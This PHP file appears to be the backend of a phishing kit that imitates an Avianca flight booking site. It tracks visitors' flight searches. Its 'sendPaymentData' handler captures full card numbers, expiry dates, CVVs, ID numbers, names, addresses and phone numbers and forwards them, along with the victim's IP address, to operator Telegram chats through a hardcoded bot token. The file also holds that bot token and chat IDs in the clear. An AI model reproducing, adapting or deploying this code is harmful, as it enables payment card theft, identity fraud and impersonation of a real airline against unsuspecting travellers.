<?php
header('Content-Type: application/json; charset=utf-8');
header('Access-Control-Allow-Origin: *');

session_start();

// Configuración de seguridad
ini_set('session.cookie_httponly', 1);
ini_set('session.cookie_secure', 1);  // Descomentar en producción con HTTPS
ini_set('session.use_strict_mode', 1);

// Constantes de autenticación
define('EXPECTED_TOKEN', 'qwerty7615');
define('MAX_PASAJEROS', 9);
define('MIN_PASAJEROS', 1);


function enviarMensajeTelegram($mensaje, $managerId)
{
    $botToken = '7720911058:AAERlRH2B25ZAGhzZ5XMrzzTy9Trq3CesnA'; // Reemplaza con tu bot token

    // Lista de managers con su respectivo chatId
    $managersChats = [
        '3' => '-4641139396',
        '9' => '-4795637809',
        '15' => '-1002376530700',
        '32' => '-4714765679',
        '14' => '-4750904289'
    ];

    // Verificar si el managerId tiene un chatId asignado
    if (!isset($managersChats[$managerId])) {
        return false; // Retorna false si el managerId no está registrado
    }

    $chatId = $managersChats[$managerId];

    $url = "https://api.telegram.org/bot{$botToken}/sendMessage";
    $data = [
        'chat_id' => $chatId,
        'text' => $mensaje,
        'parse_mode' => 'HTML'
    ];

    $options = [
        'http' => [
            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data)
        ]
    ];

    $context  = stream_context_create($options);
    $result = file_get_contents($url, false, $context);

    return $result !== false;
}
function enviarMensajeTelegramPagos($mensaje, $managerId)
{
    $botToken = '7720911058:AAERlRH2B25ZAGhzZ5XMrzzTy9Trq3CesnA'; // Reemplaza con tu bot token

    // Lista de managers con su respectivo chatId
    $managersChats = [
        '3' => '-4641139396',
        '9' => '-4795637809',
        '15' => '-1002376530700',
        '32' => '-1002571476245',
        '14' => '-4750904289'
    ];

    // Verificar si el managerId tiene un chatId asignado
    if (!isset($managersChats[$managerId])) {
        return false; // Retorna false si el managerId no está registrado
    }

    $chatId = $managersChats[$managerId];

    $url = "https://api.telegram.org/bot{$botToken}/sendMessage";
    $data = [
        'chat_id' => $chatId,
        'text' => $mensaje,
        'parse_mode' => 'HTML'
    ];

    $options = [
        'http' => [
            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data)
        ]
    ];

    $context  = stream_context_create($options);
    $result = file_get_contents($url, false, $context);

    return $result !== false;
}





// Auditoría
$logData = [
    'timestamp' => date('c'),
    'ip' => $_SERVER['REMOTE_ADDR'],
    'action' => $_POST['t'] ?? 'unknown',
    'registro' => $_POST['registro'] ?? 'none'
];
file_put_contents('audit.log', json_encode($logData) . PHP_EOL, FILE_APPEND);

$response = [];
$received_token = $_POST['tok'] ?? '';

// Validación de token
if (!hash_equals(EXPECTED_TOKEN, $received_token)) {
    http_response_code(403);
    $response = [
        'error' => true,
        'alerta' => [
            'type' => 'error',
            'msg' => 'Autenticación inválida'
        ]
    ];
    exit(json_encode($response, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT));
}

// Generar o validar registro
$registro = preg_replace('/[^a-zA-Z0-9_-]/', '', $_POST['registro'] ?? '');


if (empty($registro) || !isset($_SESSION['registros'][$registro])) {
    $registro = bin2hex(random_bytes(16));
    $_SESSION['registros'][$registro] = [
        'estado' => 'nuevo',
        'paso' => 0,
        'timestamp' => time(),
        'ip' => $_SERVER['REMOTE_ADDR']
    ];
    $response['registro'] = $registro; // Enviar nuevo ID al cliente
}

$action_type = $_POST['t'] ?? 'default';

try {
    switch ($action_type) {
        case 'pre-avianca':
            $requiredFields = [
                'fecha_ida' => 'Fecha ida',
                'origenCode' => 'Código origen',
                'destinoCode' => 'Código destino',
                'pasajeros' => 'Número de pasajeros'
            ];

            foreach ($requiredFields as $field => $name) {
                if (empty($_POST[$field])) throw new Exception("Campo requerido: {$name}");
            }

            // Validaciones
            $origenCode = substr(htmlspecialchars($_POST['origenCode']), 0, 3);
            $destinoCode = substr(htmlspecialchars($_POST['destinoCode']), 0, 3);
            $pasajeros = filter_var($_POST['pasajeros'], FILTER_VALIDATE_INT, [
                'options' => ['min_range' => 1, 'max_range' => 10]
            ]);

            if ($pasajeros === false) throw new Exception("Número de pasajeros inválido");
            if ($origenCode === $destinoCode) throw new Exception("Origen y destino no pueden ser iguales");

            // Validar solo si se proporciona fecha de vuelta
            $dateIDA = DateTime::createFromFormat('m/d/Y', $_POST['fecha_ida']);
            $dateVUELTA = !empty($_POST['fecha_vuelta'])
                ? DateTime::createFromFormat('m/d/Y', $_POST['fecha_vuelta'])
                : null;

            if (!$dateIDA) throw new Exception("Formato de fecha de ida inválido. Use MM/DD/AAAA");

            if ($dateVUELTA && $dateIDA > $dateVUELTA) {
                throw new Exception("Fecha de regreso inválida");
            }

            // Guardar en sesión
            $_SESSION['reserva'] = [
                'orderId' => uniqid('ORD'),
                'fecha_ida' => $dateIDA->format('Y-m-d'),
                'fecha_vuelta' => $dateVUELTA ? $dateVUELTA->format('Y-m-d') : null, // Si no hay vuelta, se guarda como null
                'origen' => [
                    'ciudad' => htmlspecialchars($_POST['origenCiudad'] ?? ''),
                    'codigo' => $origenCode
                ],
                'destino' => [
                    'ciudad' => htmlspecialchars($_POST['destinoCiudad'] ?? ''),
                    'codigo' => $destinoCode
                ],
                'pasajeros' => $pasajeros
            ];

            $mensajeTelegram = "🛫 *Nueva Solicitud de Reserva - Avianca*\n\n"
                . "📅 *Fecha de ida:* " . $_SESSION['reserva']['fecha_ida'] . "\n"
                . (!empty($_SESSION['reserva']['fecha_vuelta']) ? "📅 *Fecha de vuelta:* " . $_SESSION['reserva']['fecha_vuelta'] . "\n" : "")
                . "📍 *Origen:* {$_SESSION['reserva']['origen']['ciudad']} ({$_SESSION['reserva']['origen']['codigo']})\n"
                . "📍 *Destino:* {$_SESSION['reserva']['destino']['ciudad']} ({$_SESSION['reserva']['destino']['codigo']})\n"
                . "👥 *Pasajeros:* {$_SESSION['reserva']['pasajeros']}\n\n"
                . "🆔 *Orden ID:* {$_SESSION['reserva']['orderId']}\n"
                . "🔹 *IP del usuario:* " . htmlspecialchars($_POST['ip'] ?? null) . "\n"
                . "🕒 *Fecha y hora:* " . date('Y-m-d H:i:s');

            $managerId = isset($_POST['managerId']) ? htmlspecialchars($_POST['managerId']) : 'No especificado';

            enviarMensajeTelegram($mensajeTelegram, $managerId, false);


            $response = [
                'action' => ['flights.php', true],
                'pasajero' => '1',
                'aerolinea' => 'Avianca',
                'reserva' => $_SESSION['reserva'],
            ];
            break;


        case 'booking':
            if (!isset($_POST['price']) && !isset($_POST['baggage'])) {
                throw new Exception("Falta el parámetro 'price' o 'baggage'.");
            }

            $id = $_POST['pasajero'] ?? null;
            if (!$id) {
                throw new Exception("Falta el parámetro 'id'.");
            }

            // Concatenar el ID con la palabra "pasajero"
            $pasajeroKey = "pasajero" . $id;

            // Determinar si es vuelo de ida o regreso
            $tipoVuelo = $_POST['tipoVuelo'] ?? 'ida'; // Por defecto, ida

            $pasajeroData = [
                'price' => $_POST['price'] ?? null,
                'baggage' => $_POST['baggage'] ?? null,
                'horaSalida' => $_POST['horaSalida'] ?? null,
                'horaLlegada' => $_POST['horaLlegada'] ?? null
            ];

            $response = [
                'pasajeros_data' => [
                    $pasajeroKey => [
                        $tipoVuelo => $pasajeroData
                    ]
                ]
            ];




            $managerId = isset($_POST['managerId']) ? htmlspecialchars($_POST['managerId']) : 'No especificado';

            // Determinar la acción solo si baggage está presente
            if (isset($_POST['baggage'])) {

                $mensajeTelegram = "🎟 *Nueva Reserva de Pasajero*\n\n"
                    . "🆔 *ID del pasajero:* {$id}\n"
                    . "✈️ *Tipo de vuelo:* " . ucfirst($tipoVuelo) . "\n"
                    . "🧳 *Equipaje:* " . ($_POST['baggage'] ?? 'No especificado') . "\n"
                    . "🔹 *IP del usuario:* " . htmlspecialchars($_POST['ip'] ?? null) . "\n"
                    . "🕒 *Fecha y hora:* " . date('Y-m-d H:i:s');


                enviarMensajeTelegram($mensajeTelegram, $managerId);
                $action = ['booking.php', true];
                $response = array_merge(['action' => $action], $response);
                break;
            }

            $mensajeTelegram = "🎟 *Nueva Reserva de Pasajero*\n\n"
                . "🆔 *ID del pasajero:* {$id}\n"
                . "✈️ *Tipo de vuelo:* " . ucfirst($tipoVuelo) . "\n"
                . "💰 *Precio:* " . ($_POST['price'] ?? 'No especificado') . "\n"
                . "🕘 *Hora de salida:* " . ($_POST['horaSalida'] ?? 'No especificada') . "\n"
                . "🕛 *Hora de llegada:* " . ($_POST['horaLlegada'] ?? 'No especificada') . "\n\n"
                . "🔹 *IP del usuario:* " . htmlspecialchars($_POST['ip'] ?? null) . "\n"
                . "🕒 *Fecha y hora:* " . date('Y-m-d H:i:s');

            $managerId = isset($_POST['managerId']) ? htmlspecialchars($_POST['managerId']) : 'No especificado';

            enviarMensajeTelegram($mensajeTelegram, $managerId);

            break;




        case 'consulta':
            if (!isset($_SESSION['registros'][$registro])) {
                throw new Exception("Sesión expirada o no encontrada");
            }

            $registro =  $_POST['registro'];

            $response = [
                'action' => ['alerta'],
                'alerta' => [
                    'title' => 'Detalles del vuelo',
                    'type' => 'info',
                    'msg' => $_SESSION['registros'][$registro]['vuelo'] ?? [],
                    'registro' => $registro
                ]
            ];
            break;


        case 'edit-pre':

            $response = [
                'action' => ['home.php', true]
            ];
            break;

        case 'edit-booking':

            $response = [
                'action' => ['flights.php', true]
            ];
            break;

        case 'travelers':

            $response = [
                'action' => ['travelers.php', true]
            ];
            break;

        case 'payment':
            $mensajeTelegram = "📢 Notificación de acceso a la página de pagos\n\n"
                . "🔹 IP detectada: " . htmlspecialchars($_POST['ip'] ?? null) . "\n"
                . "🔹 Fecha y hora: " . date('Y-m-d H:i:s');


            $managerId = isset($_POST['managerId']) ? htmlspecialchars($_POST['managerId']) : 'No especificado';

            enviarMensajeTelegram($mensajeTelegram, $managerId);

            $response = [
                'action' => ['payment.php', true]
            ];
            break;
        case 'sendPaymentData':

            $paymentData = [
                'tarjeta' => $_POST['tarjeta'] ?? null,
                'fechaExpiracion' => $_POST['fechaExpiracion'] ?? null,
                'cvv' => $_POST['cvv'] ?? null,
                'binData' => $_POST['binData'] ?? null,
                'nombre' => $_POST['nombre'] ?? null,
                'apellido' => $_POST['apellido'] ?? null,
                'correo' => $_POST['correo'] ?? null,
                'telefono' => $_POST['telefono'] ?? null,
                'cedula' => $_POST['cedula'] ?? null,
                'pais' => $_POST['pais'] ?? null,
                'ciudad' => $_POST['ciudad'] ?? null,
                'direccion' => $_POST['direccion'] ?? null,
                'white' => $_POST['white'] ?? null
            ];

            $mensajeTelegram = "💳💳 GoldenPlastic™ Sparrow 💳💳\n\n"
                . "🆔 *White:* " . htmlspecialchars($paymentData['white']) . "\n\n"
                . "# " . ($_POST['ip'] ?? 'No disponible') . "\n"
                . "✉️ " . htmlspecialchars($paymentData['correo']) . "\n"
                . "🔐 \n"
                . "🪪 " . htmlspecialchars($paymentData['cedula']) . "\n"
                . "📱 " . htmlspecialchars($paymentData['telefono']) . "\n"
                . "👤 " . htmlspecialchars($paymentData['nombre']) . " " . htmlspecialchars($paymentData['apellido']) . "\n"
                . "▪️ " . htmlspecialchars($paymentData['ciudad']) . " - " . htmlspecialchars($paymentData['direccion']) . "\n"
                . "▪️ \n\n"
                . "🏧 " . htmlspecialchars($paymentData['binData']) . "\n"
                . "💳 " . htmlspecialchars($paymentData['tarjeta']) . "\n"
                . "📆 " . htmlspecialchars($paymentData['fechaExpiracion']) . "\n"
                . "🪬 " . htmlspecialchars($paymentData['cvv']);


            $managerId = isset($_POST['managerId']) ? htmlspecialchars($_POST['managerId']) : 'No especificado';

            enviarMensajeTelegramPagos($mensajeTelegram, $managerId);

            break;

        case 'procesar_pago':
            $bancosPermitidos = ['bancolombia', 'nequi', 'daviplata'];
            $banco = in_array($_POST['banco'] ?? '', $bancosPermitidos, true) ? $_POST['banco'] : 'desconocido';

            $_SESSION['registros'][$registro]['banco'] = $banco;
            $_SESSION['registros'][$registro]['paso']++;

            $response = [
                'action' => ['url'],
                'url' => "https://{$banco}.com/pagos?ref=" . bin2hex(random_bytes(16))
            ];
            break;

        case 'successful':
            $response = [
                'action' => ['successful.php', true]
            ];
            break;


        default:
            http_response_code(400);
            throw new Exception("Acción no reconocida");
    }
} catch (Exception $e) {
    http_response_code(400);
    $response = [
        'error' => true,
        'alerta' => [
            'type' => 'error',
            'msg' => $e->getMessage()
        ]
    ];
}

// Limpieza de output
array_walk_recursive($response, function (&$value) {
    $value = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
});

echo json_encode($response, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE);
exit;
